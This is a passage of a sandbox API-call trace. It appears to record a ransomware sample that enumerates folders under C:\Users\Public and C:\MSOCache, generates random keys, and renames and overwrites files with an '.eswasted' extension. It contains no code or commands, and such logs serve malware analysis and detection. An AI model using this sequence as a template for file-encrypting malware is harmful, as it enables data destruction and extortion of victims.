ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.228] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.228] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.228] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.228] lstrlenW (lpString="desktop.ini") returned 11 [0071.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0071.250] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.250] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.250] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0071.271] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.271] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0071.273] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0071.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.274] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0071.274] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.274] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0071.274] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.274] lstrlenW (lpString="Recorded TV") returned 11 [0071.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.275] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.275] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.275] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.275] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.275] lstrlenW (lpString="desktop.ini") returned 11 [0071.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0071.275] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.275] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.275] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.275] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.275] lstrlenW (lpString="desktop.ini") returned 11 [0071.276] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0071.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.276] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0071.276] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.276] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 1 [0071.276] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.276] lstrlenW (lpString="Videos") returned 6 [0071.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.276] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.276] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.276] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.276] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.276] lstrlenW (lpString="desktop.ini") returned 11 [0071.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0071.277] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.277] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.277] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.277] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.277] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0071.277] FindClose (in: hFindFile=0x4dd790 | out: hFindFile=0x4dd790) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1440 | out: hHeap=0x4a0000) returned 1 [0071.277] FindClose (in: hFindFile=0x4c3f90 | out: hFindFile=0x4c3f90) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5838 | out: hHeap=0x4a0000) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d5228 | out: hHeap=0x4a0000) returned 1 [0071.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c5220 | out: hHeap=0x4a0000) returned 1 [0071.277] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.278] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.278] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.278] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0071.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f5f48 [0071.278] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.278] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.278] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.279] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.279] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.279] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.279] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.280] SetEndOfFile (hFile=0xf8) returned 1 [0071.280] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.280] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.280] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted")) returned 1 [0071.321] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.321] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.321] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x41d4 [0071.321] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41d4) returned 0x2d0000 [0071.321] CloseHandle (hObject=0x120) returned 1 [0071.333] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0071.333] CloseHandle (hObject=0x118) returned 1 [0071.333] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0071.333] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.334] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.334] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.334] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.334] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.335] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.348] SetEndOfFile (hFile=0xf8) returned 1 [0071.350] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.350] CloseHandle (hObject=0xf8) returned 1 [0071.373] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0071.373] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddc20 | out: hHeap=0x4a0000) returned 1 [0071.373] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.374] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.374] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.374] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0071.374] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c0) returned 0x4e1ab8 [0071.374] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.374] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.374] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.382] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.382] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.382] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.383] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0071.383] SetEndOfFile (hFile=0xfc) returned 1 [0071.384] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.384] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.384] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0071.448] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.448] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.448] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xaec3a [0071.448] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x1220000 [0071.448] CloseHandle (hObject=0x118) returned 1 [0071.473] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0071.474] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.474] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.474] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0071.475] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0071.475] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.519] SetEndOfFile (hFile=0xfc) returned 1 [0071.521] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.521] CloseHandle (hObject=0xfc) returned 1 [0071.522] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.522] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0071.522] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0071.525] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0071.525] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.525] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1ab8 [0071.525] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.525] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.525] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0071.526] CryptGenRandom (in: hProv=0x4e5ff0, 